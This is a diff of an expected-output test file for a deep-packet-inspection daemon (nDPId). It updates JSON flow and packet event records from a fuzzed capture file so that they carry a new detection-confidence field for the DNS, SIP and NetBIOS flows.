+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470385615,"flow_last_seen":1120470394622,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1120469540839,"flow_last_seen":1120470542975,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1120469540839,"flow_last_seen":1120470542975,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00598{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1020,49 +1022,49 @@
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1120470588783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470588783,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa3oAAO8RStPAqAECwKgBcACJAIkAOltehT0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ\/VDQUJNAAAoAAE="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1120470589532,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470589532,"pkt":"\/\/\/\/\/\/\/3AODtAW69CABFAABOa3sAAIARStLAiAECwKgB\/wCJAIkAOltehT0BEAABAAAAAAAAIERGRURFSkZQRUVFUEVORUNFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00566{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00551{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00621{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00554{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
